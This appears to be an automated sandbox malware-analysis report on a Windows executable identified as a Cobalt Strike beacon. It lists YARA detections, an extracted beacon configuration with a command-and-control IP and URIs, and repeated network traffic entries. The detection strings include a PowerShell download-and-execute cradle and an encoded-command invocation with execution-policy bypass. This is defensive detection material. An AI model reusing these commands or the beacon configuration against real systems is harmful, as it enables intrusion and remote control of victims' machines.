0.2.cH0s914NeF.exe.3a60000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2fa8f:$s1: %%IMPORT%% 0x2ef87:$s2: www6.%x%x.%s 0x2ef7b:$s3: cdn.%x%x.%s 0x2f203:$s4: api.%x%x.%s 0x2ff70:$s5: %s (admin) 0x2f272:$s6: could not spawn %s: %d 0x2fb33:$s7: Could not kill %d: %d 0x2f34c:$s8: Could not connect to pipe (%s): %d 0x2ef94:$s9: %s.1%x.%x%x.%s 0x2efa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f01b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f07e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f0c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2f1a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2f1c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2f1dd:$s9: %s.1%08x%08x.%x%x.%s 0x2f1f2:$s9: %s.1%08x.%x%x.%s
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x309a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31185:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x314b7:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31449:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x314b7:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x30a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x30ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31501:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x30d6f:$a11: Could not open service control manager on %s: %d 0x312a1:$a12: %d is an x64 process (can't inject x86 content) 0x312d1:$a13: %d is an x86 process (can't inject x64 content) 0x315f2:$a14: Failed to impersonate logged on user %d (%u) 0x3125a:$a15: could not create remote thread in %d: %d 0x30b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31208:$a17: could not write to process memory: %d 0x30da0:$a18: Could not create service %s on %s: %d 0x30e29:$a19: Could not delete service %s on %s: %d 0x30c89:$a20: Could not open process token: %d (%u)
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1b8f4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Windows_Trojan_CobaltStrike_b54b94ac	Rule for beacon sleep obfuscation routine	unknown	0x4017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17b3a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x314b7:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31501:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x3: %d is an x86 process (can't inject x64 content) 0x30c89:$s1: Could not open process token: %d (%u) 0x309a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s4: Could not connect to pipe (%s): %d
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3fb21:$loader_export: ReflectiveLoader 0x30960:$exportname: beacon.dll
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x312a1:$x2: %d is an x64 process (can't inject x86 content) 0x315f2:$x3: Failed to impersonate logged on user %d (%u) 0x31501:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x314b7:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x30c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31208:$s4: could not write to process memory: %d 0x309a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30d4c:$s6: Could not connect to pipe (%s): %d
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31970:$str1: %s (admin) 0x30960:$str2: beacon.dll
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31501:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x312d1:$x2: %d is an x86 process (can't inject x64 content) 0x314b7:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3159b:$x4: Failed to impersonate token from %d (%u) 0x315f2:$x5: Failed to impersonate logged on user %d (%u) 0x309a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.cH0s914NeF.exe.3a60000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3148f:$s1: %%IMPORT%% 0x30987:$s2: www6.%x%x.%s 0x3097b:$s3: cdn.%x%x.%s 0x30c03:$s4: api.%x%x.%s 0x31970:$s5: %s (admin) 0x30c72:$s6: could not spawn %s: %d 0x31533:$s7: Could not kill %d: %d 0x30d4c:$s8: Could not connect to pipe (%s): %d 0x30994:$s9: %s.1%x.%x%x.%s 0x309a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x30ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x30bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x30bdd:$s9: %s.1%08x%08x.%x%x.%s 0x30bf2:$s9: %s.1%08x.%x%x.%s
Click to see the 20 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.3263445653.00000000036A2000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 886, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "118.89.125.171,/ga.js", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for domain / URL

Source: http://118.89.125.171:886/ZZv3ce	Virustotal: Detection: 14%	Perma Link
Source: http://118.89.125.171:886/ZZv3	Virustotal: Detection: 11%	Perma Link
Source: http://118.89.125.171:886/ga.jsp	Virustotal: Detection: 14%	Perma Link
Source: http://118.89.125.171:886/ga.js5.171:886/ga.js	Virustotal: Detection: 11%	Perma Link
Source: http://118.89.125.171:886/ga.js8	Virustotal: Detection: 14%	Perma Link
Source: 118.89.125.171	Virustotal: Detection: 17%	Perma Link
Source: http://118.89.125.171:886/ga.js	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for submitted file

Source: cH0s914NeF.exe	ReversingLabs: Detection: 55%
Source: cH0s914NeF.exe	Virustotal: Detection: 60%			Perma Link

Source: C:\Users\user\Desktop\cH0s914NeF.exe

Code function: 0_2_03A61184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

0_2_03A61184

Source: cH0s914NeF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A70F28 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03A70F28
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 0_2_03A7780C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_03A7780C

Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push r12	0_2_004982E0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then mov r8, qword ptr [rdx+08h]	0_2_004903D0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then sub rsp, 38h	0_2_00490640
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then sub rsp, 28h	0_2_00498831
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push r12	0_2_004768E9
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rsi	0_2_00462B17
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rsi	0_2_004A0BD0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rsi	0_2_004A0BD0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push r12	0_2_00498C50
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then mov qword ptr [rcx+08h], rdx	0_2_0048ED30
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rbx	0_2_004A0DD0
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rdi	0_2_00462DBB
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rbp	0_2_0049EE54
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rdi	0_2_00462E02
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then mov rax, qword ptr [rcx+10h]	0_2_0041EFA9
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rdi	0_2_0046544A
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rdi	0_2_0049B420
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rbx	0_2_0046165B
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then mov qword ptr [rcx+08h], rdx	0_2_00491680
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rbx	0_2_004616A2
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then push rbx	0_2_0044B82E
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then mov r8, qword ptr [rdx+08h]	0_2_0048DB70
Source: C:\Users\user\Desktop\cH0s914NeF.exe	Code function: 4x nop then sub rsp, 38h	0_2_0048DDE0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 118.89.125.171

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 886
Source: unknown	Network traffic detected: HTTP traffic on port 886 -> 49828
